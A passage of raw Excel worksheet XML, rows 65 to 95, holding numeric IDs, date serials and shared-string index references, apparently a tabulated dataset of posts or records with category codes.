    <row r="65" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A65" s="3">
        <v>16104</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>238</v>
      </c>
      <c r="C65" s="9" t="s">
        <v>1810</v>
      </c>
      <c r="D65" s="9" t="s">
        <v>1811</v>
      </c>
      <c r="E65" s="9">
        <v>905</v>
      </c>
      <c r="F65" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="G65" s="10">
        <v>42431.525000000001</v>
      </c>
      <c r="H65" s="9">
        <v>196919</v>
      </c>
      <c r="I65" s="9" t="s">
        <v>1812</v>
      </c>
      <c r="J65" s="10">
        <v>42384.784722222219</v>
      </c>
      <c r="K65" s="3" t="s">
        <v>239</v>
      </c>
      <c r="L65" s="4">
        <v>5</v>
      </c>
      <c r="M65" s="4">
        <v>3</v>
      </c>
      <c r="N65" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O65" s="3"/>
      <c r="P65" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q65" s="3"/>
    </row>
    <row r="66" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A66" s="3">
        <v>16381</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>240</v>
      </c>
      <c r="C66" s="9" t="s">
        <v>1813</v>
      </c>
      <c r="D66" s="9" t="s">
        <v>1814</v>
      </c>
      <c r="E66" s="9">
        <v>905</v>
      </c>
      <c r="F66" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="G66" s="10">
        <v>42184.350694444445</v>
      </c>
      <c r="H66" s="9">
        <v>63550</v>
      </c>
      <c r="I66" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J66" s="10">
        <v>42182.486111111109</v>
      </c>
      <c r="K66" s="3" t="s">
        <v>241</v>
      </c>
      <c r="L66" s="4">
        <v>4</v>
      </c>
      <c r="M66" s="4">
        <v>2</v>
      </c>
      <c r="N66" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O66" s="3" t="s">
        <v>705</v>
      </c>
      <c r="P66" s="3"/>
      <c r="Q66" s="3"/>
    </row>
    <row r="67" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A67" s="3">
        <v>16749</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>286</v>
      </c>
      <c r="C67" s="9" t="s">
        <v>1815</v>
      </c>
      <c r="D67" s="9" t="s">
        <v>1816</v>
      </c>
      <c r="E67" s="9">
        <v>999</v>
      </c>
      <c r="F67" s="9" t="s">
        <v>1817</v>
      </c>
      <c r="G67" s="10">
        <v>41012.42291666667</v>
      </c>
      <c r="H67" s="9">
        <v>1219121</v>
      </c>
      <c r="I67" s="9" t="s">
        <v>1818</v>
      </c>
      <c r="J67" s="10">
        <v>41000.418055555558</v>
      </c>
      <c r="K67" s="3" t="s">
        <v>287</v>
      </c>
      <c r="L67" s="4">
        <v>4</v>
      </c>
      <c r="M67" s="4">
        <v>2</v>
      </c>
      <c r="N67" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O67" s="3"/>
      <c r="P67" s="3"/>
      <c r="Q67" s="3"/>
    </row>
    <row r="68" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A68" s="9">
        <v>17670</v>
      </c>
      <c r="B68" s="9" t="s">
        <v>895</v>
      </c>
      <c r="C68" s="9" t="s">
        <v>1819</v>
      </c>
      <c r="D68" s="9" t="s">
        <v>1820</v>
      </c>
      <c r="E68" s="9">
        <v>379</v>
      </c>
      <c r="F68" s="9" t="s">
        <v>1821</v>
      </c>
      <c r="G68" s="10">
        <v>39680.438888888886</v>
      </c>
      <c r="H68" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I68" s="9" t="s">
        <v>1822</v>
      </c>
      <c r="J68" s="10">
        <v>39680.431944444441</v>
      </c>
      <c r="K68" s="9" t="s">
        <v>896</v>
      </c>
      <c r="L68" s="7">
        <v>4</v>
      </c>
      <c r="M68" s="7">
        <v>2</v>
      </c>
      <c r="P68" s="9" t="s">
        <v>715</v>
      </c>
      <c r="Q68" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="69" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A69" s="3">
        <v>17916</v>
      </c>
      <c r="B69" s="3" t="s">
        <v>288</v>
      </c>
      <c r="C69" s="9" t="s">
        <v>1823</v>
      </c>
      <c r="D69" s="9" t="s">
        <v>1824</v>
      </c>
      <c r="E69" s="9">
        <v>1659</v>
      </c>
      <c r="F69" s="9" t="s">
        <v>1825</v>
      </c>
      <c r="G69" s="10">
        <v>42845.634027777778</v>
      </c>
      <c r="H69" s="9">
        <v>4380409</v>
      </c>
      <c r="I69" s="9" t="s">
        <v>1826</v>
      </c>
      <c r="J69" s="10">
        <v>42845.318055555559</v>
      </c>
      <c r="K69" s="3" t="s">
        <v>289</v>
      </c>
      <c r="L69" s="4">
        <v>3</v>
      </c>
      <c r="M69" s="4">
        <v>1</v>
      </c>
      <c r="N69" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O69" s="3"/>
      <c r="P69" s="3"/>
      <c r="Q69" s="3"/>
    </row>
    <row r="70" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A70" s="9">
        <v>18082</v>
      </c>
      <c r="B70" s="9" t="s">
        <v>897</v>
      </c>
      <c r="C70" s="9" t="s">
        <v>1827</v>
      </c>
      <c r="D70" s="9" t="s">
        <v>1828</v>
      </c>
      <c r="E70" s="9">
        <v>29</v>
      </c>
      <c r="F70" s="9" t="s">
        <v>1829</v>
      </c>
      <c r="G70" s="10">
        <v>39728.554166666669</v>
      </c>
      <c r="H70" s="9">
        <v>2688</v>
      </c>
      <c r="I70" s="9" t="s">
        <v>1830</v>
      </c>
      <c r="J70" s="10">
        <v>39727.806944444441</v>
      </c>
      <c r="K70" s="9" t="s">
        <v>898</v>
      </c>
      <c r="L70" s="7">
        <v>5</v>
      </c>
      <c r="M70" s="7">
        <v>1</v>
      </c>
      <c r="N70" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="71" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A71" s="3">
        <v>18322</v>
      </c>
      <c r="B71" s="3" t="s">
        <v>290</v>
      </c>
      <c r="C71" s="9" t="s">
        <v>1831</v>
      </c>
      <c r="D71" s="9" t="s">
        <v>1832</v>
      </c>
      <c r="E71" s="9">
        <v>770</v>
      </c>
      <c r="F71" s="9" t="s">
        <v>1736</v>
      </c>
      <c r="G71" s="10">
        <v>41304.664583333331</v>
      </c>
      <c r="H71" s="9">
        <v>1410342</v>
      </c>
      <c r="I71" s="9" t="s">
        <v>1833</v>
      </c>
      <c r="J71" s="10">
        <v>41297.210416666669</v>
      </c>
      <c r="K71" s="3" t="s">
        <v>291</v>
      </c>
      <c r="L71" s="4">
        <v>3</v>
      </c>
      <c r="M71" s="4">
        <v>1</v>
      </c>
      <c r="N71" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O71" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P71" s="3"/>
      <c r="Q71" s="3"/>
    </row>
    <row r="72" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A72" s="9">
        <v>19151</v>
      </c>
      <c r="B72" s="9" t="s">
        <v>899</v>
      </c>
      <c r="C72" s="9" t="s">
        <v>1834</v>
      </c>
      <c r="D72" s="9" t="s">
        <v>1835</v>
      </c>
      <c r="E72" s="9">
        <v>2357112</v>
      </c>
      <c r="F72" s="9" t="s">
        <v>1836</v>
      </c>
      <c r="G72" s="10">
        <v>42578.914583333331</v>
      </c>
      <c r="H72" s="9">
        <v>284795</v>
      </c>
      <c r="I72" s="9" t="s">
        <v>1837</v>
      </c>
      <c r="J72" s="10">
        <v>42197.552777777775</v>
      </c>
      <c r="K72" s="9" t="s">
        <v>900</v>
      </c>
      <c r="L72" s="7">
        <v>4</v>
      </c>
      <c r="M72" s="7">
        <v>2</v>
      </c>
      <c r="N72" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="73" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A73" s="3">
        <v>19343</v>
      </c>
      <c r="B73" s="3" t="s">
        <v>292</v>
      </c>
      <c r="C73" s="9" t="s">
        <v>1838</v>
      </c>
      <c r="D73" s="9" t="s">
        <v>1839</v>
      </c>
      <c r="E73" s="9">
        <v>429</v>
      </c>
      <c r="F73" s="9" t="s">
        <v>1840</v>
      </c>
      <c r="G73" s="10">
        <v>42899.006249999999</v>
      </c>
      <c r="H73" s="9">
        <v>1959808</v>
      </c>
      <c r="I73" s="9" t="s">
        <v>1841</v>
      </c>
      <c r="J73" s="10">
        <v>42898.349305555559</v>
      </c>
      <c r="K73" s="3" t="s">
        <v>293</v>
      </c>
      <c r="L73" s="4">
        <v>6</v>
      </c>
      <c r="M73" s="4">
        <v>4</v>
      </c>
      <c r="N73" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O73" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P73" s="3" t="s">
        <v>697</v>
      </c>
      <c r="Q73" s="3"/>
    </row>
    <row r="74" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A74" s="9">
        <v>20148</v>
      </c>
      <c r="B74" s="9" t="s">
        <v>901</v>
      </c>
      <c r="C74" s="9" t="s">
        <v>1842</v>
      </c>
      <c r="D74" s="9" t="s">
        <v>1843</v>
      </c>
      <c r="E74" s="9">
        <v>19679</v>
      </c>
      <c r="F74" s="9" t="s">
        <v>809</v>
      </c>
      <c r="G74" s="10">
        <v>41331.895833333336</v>
      </c>
      <c r="H74" s="9">
        <v>998158</v>
      </c>
      <c r="I74" s="9" t="s">
        <v>1844</v>
      </c>
      <c r="J74" s="10">
        <v>41331.432638888888</v>
      </c>
      <c r="K74" s="9" t="s">
        <v>902</v>
      </c>
      <c r="L74" s="7">
        <v>6</v>
      </c>
      <c r="M74" s="7">
        <v>4</v>
      </c>
      <c r="N74" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="75" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A75" s="3">
        <v>20431</v>
      </c>
      <c r="B75" s="3" t="s">
        <v>294</v>
      </c>
      <c r="C75" s="9" t="s">
        <v>1845</v>
      </c>
      <c r="D75" s="9" t="s">
        <v>1846</v>
      </c>
      <c r="E75" s="9">
        <v>905</v>
      </c>
      <c r="F75" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="G75" s="10">
        <v>40387.548611111109</v>
      </c>
      <c r="H75" s="9">
        <v>63550</v>
      </c>
      <c r="I75" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J75" s="10">
        <v>40386.759722222225</v>
      </c>
      <c r="K75" s="3" t="s">
        <v>295</v>
      </c>
      <c r="L75" s="4">
        <v>3</v>
      </c>
      <c r="M75" s="4">
        <v>1</v>
      </c>
      <c r="N75" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O75" s="3"/>
      <c r="P75" s="3"/>
      <c r="Q75" s="3"/>
    </row>
    <row r="76" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A76" s="9">
        <v>20728</v>
      </c>
      <c r="B76" s="9" t="s">
        <v>903</v>
      </c>
      <c r="C76" s="9" t="s">
        <v>1847</v>
      </c>
      <c r="D76" s="9" t="s">
        <v>1848</v>
      </c>
      <c r="E76" s="9">
        <v>1321</v>
      </c>
      <c r="F76" s="9" t="s">
        <v>1849</v>
      </c>
      <c r="G76" s="10">
        <v>42338.084722222222</v>
      </c>
      <c r="H76" s="9">
        <v>1537726</v>
      </c>
      <c r="I76" s="9" t="s">
        <v>1850</v>
      </c>
      <c r="J76" s="10">
        <v>41763.908333333333</v>
      </c>
      <c r="K76" s="9" t="s">
        <v>904</v>
      </c>
      <c r="L76" s="7">
        <v>3</v>
      </c>
      <c r="M76" s="7">
        <v>1</v>
      </c>
      <c r="N76" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="77" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A77" s="9">
        <v>21229</v>
      </c>
      <c r="B77" s="9" t="s">
        <v>905</v>
      </c>
      <c r="C77" s="9" t="s">
        <v>1851</v>
      </c>
      <c r="D77" s="9" t="s">
        <v>1852</v>
      </c>
      <c r="E77" s="9">
        <v>1344</v>
      </c>
      <c r="F77" s="9" t="s">
        <v>1793</v>
      </c>
      <c r="G77" s="10">
        <v>42230.824999999997</v>
      </c>
      <c r="H77" s="9">
        <v>2442804</v>
      </c>
      <c r="I77" s="9" t="s">
        <v>1853</v>
      </c>
      <c r="J77" s="10">
        <v>42185.584722222222</v>
      </c>
      <c r="K77" s="9" t="s">
        <v>906</v>
      </c>
      <c r="L77" s="7">
        <v>4</v>
      </c>
      <c r="M77" s="7">
        <v>2</v>
      </c>
      <c r="N77" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="78" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A78" s="9">
        <v>21593</v>
      </c>
      <c r="B78" s="9" t="s">
        <v>907</v>
      </c>
      <c r="C78" s="9" t="s">
        <v>1854</v>
      </c>
      <c r="D78" s="9" t="s">
        <v>1855</v>
      </c>
      <c r="E78" s="9">
        <v>1307905</v>
      </c>
      <c r="F78" s="9" t="s">
        <v>1856</v>
      </c>
      <c r="G78" s="10">
        <v>42454.461111111108</v>
      </c>
      <c r="H78" s="9">
        <v>4684058</v>
      </c>
      <c r="I78" s="9" t="s">
        <v>1857</v>
      </c>
      <c r="J78" s="10">
        <v>42445.724999999999</v>
      </c>
      <c r="K78" s="9" t="s">
        <v>908</v>
      </c>
      <c r="L78" s="7">
        <v>11</v>
      </c>
      <c r="M78" s="7">
        <v>9</v>
      </c>
      <c r="N78" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O78" s="9" t="s">
        <v>702</v>
      </c>
      <c r="P78" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="79" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A79" s="9">
        <v>22444</v>
      </c>
      <c r="B79" s="9" t="s">
        <v>909</v>
      </c>
      <c r="C79" s="9" t="s">
        <v>1858</v>
      </c>
      <c r="D79" s="9" t="s">
        <v>1859</v>
      </c>
      <c r="E79" s="9">
        <v>305</v>
      </c>
      <c r="F79" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="G79" s="10">
        <v>41051.646527777775</v>
      </c>
      <c r="H79" s="9">
        <v>744859</v>
      </c>
      <c r="I79" s="9" t="s">
        <v>1861</v>
      </c>
      <c r="J79" s="10">
        <v>41051.458333333336</v>
      </c>
      <c r="K79" s="9" t="s">
        <v>910</v>
      </c>
      <c r="L79" s="7">
        <v>4</v>
      </c>
      <c r="M79" s="7">
        <v>1</v>
      </c>
      <c r="N79" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="80" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A80" s="9">
        <v>23190</v>
      </c>
      <c r="B80" s="9" t="s">
        <v>911</v>
      </c>
      <c r="C80" s="9" t="s">
        <v>1862</v>
      </c>
      <c r="D80" s="9" t="s">
        <v>1863</v>
      </c>
      <c r="E80" s="9">
        <v>522</v>
      </c>
      <c r="F80" s="9" t="s">
        <v>1864</v>
      </c>
      <c r="G80" s="10">
        <v>39682.79791666667</v>
      </c>
      <c r="H80" s="9">
        <v>1</v>
      </c>
      <c r="I80" s="9" t="s">
        <v>1865</v>
      </c>
      <c r="J80" s="10">
        <v>39682.794444444444</v>
      </c>
      <c r="K80" s="9" t="s">
        <v>912</v>
      </c>
      <c r="L80" s="7">
        <v>5</v>
      </c>
      <c r="M80" s="7">
        <v>3</v>
      </c>
      <c r="N80" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="81" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A81" s="3">
        <v>24156</v>
      </c>
      <c r="B81" s="3" t="s">
        <v>396</v>
      </c>
      <c r="C81" s="9" t="s">
        <v>1866</v>
      </c>
      <c r="D81" s="9" t="s">
        <v>1867</v>
      </c>
      <c r="E81" s="9">
        <v>1968</v>
      </c>
      <c r="F81" s="9" t="s">
        <v>1868</v>
      </c>
      <c r="G81" s="10">
        <v>40926.449999999997</v>
      </c>
      <c r="H81" s="9">
        <v>462370</v>
      </c>
      <c r="I81" s="9" t="s">
        <v>1869</v>
      </c>
      <c r="J81" s="10">
        <v>40925.801388888889</v>
      </c>
      <c r="K81" s="3" t="s">
        <v>397</v>
      </c>
      <c r="L81" s="4">
        <v>6</v>
      </c>
      <c r="M81" s="4">
        <v>2</v>
      </c>
      <c r="N81" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O81" s="3"/>
      <c r="P81" s="3"/>
      <c r="Q81" s="3"/>
    </row>
    <row r="82" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A82" s="3">
        <v>24296</v>
      </c>
      <c r="B82" s="3" t="s">
        <v>398</v>
      </c>
      <c r="C82" s="9" t="s">
        <v>1870</v>
      </c>
      <c r="D82" s="9" t="s">
        <v>1871</v>
      </c>
      <c r="E82" s="9">
        <v>1337</v>
      </c>
      <c r="F82" s="9" t="s">
        <v>1872</v>
      </c>
      <c r="G82" s="10">
        <v>39713.649305555555</v>
      </c>
      <c r="H82" s="9">
        <v>1337</v>
      </c>
      <c r="I82" s="9" t="s">
        <v>1872</v>
      </c>
      <c r="J82" s="10">
        <v>39713.624305555553</v>
      </c>
      <c r="K82" s="3" t="s">
        <v>399</v>
      </c>
      <c r="L82" s="4">
        <v>4</v>
      </c>
      <c r="M82" s="4">
        <v>2</v>
      </c>
      <c r="N82" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O82" s="3"/>
      <c r="P82" s="3"/>
      <c r="Q82" s="3"/>
    </row>
    <row r="83" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A83" s="9">
        <v>24797</v>
      </c>
      <c r="B83" s="9" t="s">
        <v>913</v>
      </c>
      <c r="C83" s="9" t="s">
        <v>1873</v>
      </c>
      <c r="D83" s="9" t="s">
        <v>1874</v>
      </c>
      <c r="E83" s="9">
        <v>1950</v>
      </c>
      <c r="F83" s="9" t="s">
        <v>1875</v>
      </c>
      <c r="G83" s="10">
        <v>39684.859722222223</v>
      </c>
      <c r="H83" s="9">
        <v>1950</v>
      </c>
      <c r="I83" s="9" t="s">
        <v>1875</v>
      </c>
      <c r="J83" s="10">
        <v>39684.088888888888</v>
      </c>
      <c r="K83" s="9" t="s">
        <v>914</v>
      </c>
      <c r="L83" s="7">
        <v>2</v>
      </c>
      <c r="M83" s="7">
        <v>1</v>
      </c>
      <c r="N83" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="84" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A84" s="9">
        <v>24901</v>
      </c>
      <c r="B84" s="9" t="s">
        <v>915</v>
      </c>
      <c r="C84" s="9" t="s">
        <v>1876</v>
      </c>
      <c r="D84" s="9" t="s">
        <v>1877</v>
      </c>
      <c r="E84" s="9">
        <v>5963</v>
      </c>
      <c r="F84" s="9" t="s">
        <v>1878</v>
      </c>
      <c r="G84" s="10">
        <v>39732.872916666667</v>
      </c>
      <c r="H84" s="9">
        <v>116</v>
      </c>
      <c r="I84" s="9" t="s">
        <v>1705</v>
      </c>
      <c r="J84" s="10">
        <v>39732.830555555556</v>
      </c>
      <c r="K84" s="9" t="s">
        <v>916</v>
      </c>
      <c r="L84" s="7">
        <v>6</v>
      </c>
      <c r="M84" s="7">
        <v>4</v>
      </c>
      <c r="Q84" s="9" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="85" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A85" s="3">
        <v>24904</v>
      </c>
      <c r="B85" s="3" t="s">
        <v>400</v>
      </c>
      <c r="C85" s="9" t="s">
        <v>1879</v>
      </c>
      <c r="D85" s="9" t="s">
        <v>1880</v>
      </c>
      <c r="E85" s="9">
        <v>59379</v>
      </c>
      <c r="F85" s="9" t="s">
        <v>1881</v>
      </c>
      <c r="G85" s="10">
        <v>40533.425694444442</v>
      </c>
      <c r="H85" s="9">
        <v>116</v>
      </c>
      <c r="I85" s="9" t="s">
        <v>1705</v>
      </c>
      <c r="J85" s="10">
        <v>39732.830555555556</v>
      </c>
      <c r="K85" s="3" t="s">
        <v>401</v>
      </c>
      <c r="L85" s="4">
        <v>4</v>
      </c>
      <c r="M85" s="4">
        <v>2</v>
      </c>
      <c r="N85" s="3"/>
      <c r="O85" s="3"/>
      <c r="P85" s="3"/>
      <c r="Q85" s="3" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="86" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A86" s="3">
        <v>25139</v>
      </c>
      <c r="B86" s="3" t="s">
        <v>402</v>
      </c>
      <c r="C86" s="9" t="s">
        <v>1882</v>
      </c>
      <c r="D86" s="9" t="s">
        <v>1883</v>
      </c>
      <c r="E86" s="9">
        <v>2025</v>
      </c>
      <c r="F86" s="9" t="s">
        <v>1884</v>
      </c>
      <c r="G86" s="10">
        <v>39684.698611111111</v>
      </c>
      <c r="H86" s="9">
        <v>26</v>
      </c>
      <c r="I86" s="9" t="s">
        <v>1885</v>
      </c>
      <c r="J86" s="10">
        <v>39684.684027777781</v>
      </c>
      <c r="K86" s="3" t="s">
        <v>403</v>
      </c>
      <c r="L86" s="4">
        <v>3</v>
      </c>
      <c r="M86" s="4">
        <v>1</v>
      </c>
      <c r="N86" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O86" s="3"/>
      <c r="P86" s="3"/>
      <c r="Q86" s="3"/>
    </row>
    <row r="87" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A87" s="9">
        <v>25192</v>
      </c>
      <c r="B87" s="9" t="s">
        <v>917</v>
      </c>
      <c r="C87" s="9" t="s">
        <v>1886</v>
      </c>
      <c r="D87" s="9" t="s">
        <v>1887</v>
      </c>
      <c r="E87" s="9">
        <v>2227743</v>
      </c>
      <c r="F87" s="9" t="s">
        <v>1888</v>
      </c>
      <c r="G87" s="10">
        <v>42935.699305555558</v>
      </c>
      <c r="H87" s="9">
        <v>7750640</v>
      </c>
      <c r="I87" s="9" t="s">
        <v>1889</v>
      </c>
      <c r="J87" s="10">
        <v>42935.683333333334</v>
      </c>
      <c r="K87" s="9" t="s">
        <v>918</v>
      </c>
      <c r="L87" s="7">
        <v>6</v>
      </c>
      <c r="M87" s="7">
        <v>4</v>
      </c>
      <c r="N87" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="88" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A88" s="9">
        <v>25259</v>
      </c>
      <c r="B88" s="9" t="s">
        <v>919</v>
      </c>
      <c r="C88" s="9" t="s">
        <v>1890</v>
      </c>
      <c r="D88" s="9" t="s">
        <v>1891</v>
      </c>
      <c r="E88" s="9">
        <v>269</v>
      </c>
      <c r="F88" s="9" t="s">
        <v>1892</v>
      </c>
      <c r="G88" s="10">
        <v>39684.769444444442</v>
      </c>
      <c r="H88" s="9">
        <v>269</v>
      </c>
      <c r="I88" s="9" t="s">
        <v>1892</v>
      </c>
      <c r="J88" s="10">
        <v>39684.768750000003</v>
      </c>
      <c r="K88" s="9" t="s">
        <v>920</v>
      </c>
      <c r="L88" s="7">
        <v>4</v>
      </c>
      <c r="M88" s="7">
        <v>2</v>
      </c>
      <c r="N88" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O88" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="89" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A89" s="3">
        <v>25597</v>
      </c>
      <c r="B89" s="3" t="s">
        <v>404</v>
      </c>
      <c r="C89" s="9" t="s">
        <v>1893</v>
      </c>
      <c r="D89" s="9" t="s">
        <v>1894</v>
      </c>
      <c r="E89" s="9">
        <v>1117</v>
      </c>
      <c r="F89" s="9" t="s">
        <v>1895</v>
      </c>
      <c r="G89" s="10">
        <v>39685.160416666666</v>
      </c>
      <c r="H89" s="9">
        <v>1117</v>
      </c>
      <c r="I89" s="9" t="s">
        <v>1895</v>
      </c>
      <c r="J89" s="10">
        <v>39685.134027777778</v>
      </c>
      <c r="K89" s="3" t="s">
        <v>405</v>
      </c>
      <c r="L89" s="4">
        <v>3</v>
      </c>
      <c r="M89" s="4">
        <v>1</v>
      </c>
      <c r="N89" s="3"/>
      <c r="O89" s="3"/>
      <c r="P89" s="3"/>
      <c r="Q89" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="90" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A90" s="9">
        <v>26551</v>
      </c>
      <c r="B90" s="9" t="s">
        <v>921</v>
      </c>
      <c r="C90" s="9" t="s">
        <v>1896</v>
      </c>
      <c r="D90" s="9" t="s">
        <v>1897</v>
      </c>
      <c r="E90" s="9">
        <v>730</v>
      </c>
      <c r="F90" s="9" t="s">
        <v>1898</v>
      </c>
      <c r="G90" s="10">
        <v>41647.896527777775</v>
      </c>
      <c r="H90" s="9">
        <v>895646</v>
      </c>
      <c r="I90" s="9" t="s">
        <v>1899</v>
      </c>
      <c r="J90" s="10">
        <v>41646.82916666667</v>
      </c>
      <c r="K90" s="9" t="s">
        <v>922</v>
      </c>
      <c r="L90" s="7">
        <v>12</v>
      </c>
      <c r="M90" s="7">
        <v>10</v>
      </c>
      <c r="N90" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O90" s="9" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="91" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A91" s="9">
        <v>27509</v>
      </c>
      <c r="B91" s="9" t="s">
        <v>923</v>
      </c>
      <c r="C91" s="9" t="s">
        <v>1900</v>
      </c>
      <c r="D91" s="9" t="s">
        <v>1901</v>
      </c>
      <c r="E91" s="9">
        <v>707111</v>
      </c>
      <c r="F91" s="9" t="s">
        <v>1902</v>
      </c>
      <c r="G91" s="10">
        <v>42317.04583333333</v>
      </c>
      <c r="H91" s="9">
        <v>1059101</v>
      </c>
      <c r="I91" s="9" t="s">
        <v>1903</v>
      </c>
      <c r="J91" s="10">
        <v>42313.307638888888</v>
      </c>
      <c r="K91" s="9" t="s">
        <v>924</v>
      </c>
      <c r="L91" s="7">
        <v>8</v>
      </c>
      <c r="M91" s="7">
        <v>6</v>
      </c>
      <c r="N91" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="92" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A92" s="9">
        <v>27598</v>
      </c>
      <c r="B92" s="9" t="s">
        <v>925</v>
      </c>
      <c r="C92" s="9" t="s">
        <v>1904</v>
      </c>
      <c r="D92" s="9" t="s">
        <v>1905</v>
      </c>
      <c r="E92" s="9">
        <v>2937</v>
      </c>
      <c r="F92" s="9" t="s">
        <v>1906</v>
      </c>
      <c r="G92" s="10">
        <v>39687.238194444442</v>
      </c>
      <c r="H92" s="9">
        <v>2937</v>
      </c>
      <c r="I92" s="9" t="s">
        <v>1906</v>
      </c>
      <c r="J92" s="10">
        <v>39686.377083333333</v>
      </c>
      <c r="K92" s="9" t="s">
        <v>926</v>
      </c>
      <c r="L92" s="7">
        <v>2</v>
      </c>
      <c r="M92" s="7">
        <v>1</v>
      </c>
      <c r="O92" s="9" t="s">
        <v>697</v>
      </c>
      <c r="Q92" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="93" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A93" s="9">
        <v>27972</v>
      </c>
      <c r="B93" s="9" t="s">
        <v>927</v>
      </c>
      <c r="C93" s="9" t="s">
        <v>1907</v>
      </c>
      <c r="D93" s="9" t="s">
        <v>1908</v>
      </c>
      <c r="E93" s="9">
        <v>26</v>
      </c>
      <c r="F93" s="9" t="s">
        <v>1885</v>
      </c>
      <c r="G93" s="10">
        <v>39686.56527777778</v>
      </c>
      <c r="H93" s="9">
        <v>137</v>
      </c>
      <c r="I93" s="9" t="s">
        <v>1909</v>
      </c>
      <c r="J93" s="10">
        <v>39686.556250000001</v>
      </c>
      <c r="K93" s="9" t="s">
        <v>928</v>
      </c>
      <c r="L93" s="7">
        <v>3</v>
      </c>
      <c r="M93" s="7">
        <v>1</v>
      </c>
      <c r="N93" s="9" t="s">
        <v>716</v>
      </c>
      <c r="Q93" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="94" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A94" s="9">
        <v>28110</v>
      </c>
      <c r="B94" s="9" t="s">
        <v>929</v>
      </c>
      <c r="C94" s="9" t="s">
        <v>1910</v>
      </c>
      <c r="D94" s="9" t="s">
        <v>1911</v>
      </c>
      <c r="E94" s="9">
        <v>53114</v>
      </c>
      <c r="F94" s="9" t="s">
        <v>1912</v>
      </c>
      <c r="G94" s="10">
        <v>40783.400694444441</v>
      </c>
      <c r="H94" s="9">
        <v>53114</v>
      </c>
      <c r="I94" s="9" t="s">
        <v>1912</v>
      </c>
      <c r="J94" s="10">
        <v>40783.4</v>
      </c>
      <c r="K94" s="9" t="s">
        <v>930</v>
      </c>
      <c r="L94" s="7">
        <v>5</v>
      </c>
      <c r="M94" s="7">
        <v>3</v>
      </c>
      <c r="N94" s="9" t="s">
        <v>700</v>
      </c>
    </row>
    <row r="95" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A95" s="9">
        <v>28150</v>
      </c>
      <c r="B95" s="9" t="s">
        <v>931</v>
      </c>
      <c r="C95" s="9" t="s">
        <v>1913</v>
      </c>
      <c r="D95" s="9" t="s">
        <v>1914</v>
      </c>
      <c r="E95" s="9">
        <v>832</v>
      </c>
      <c r="F95" s="9" t="s">
        <v>1915</v>
      </c>
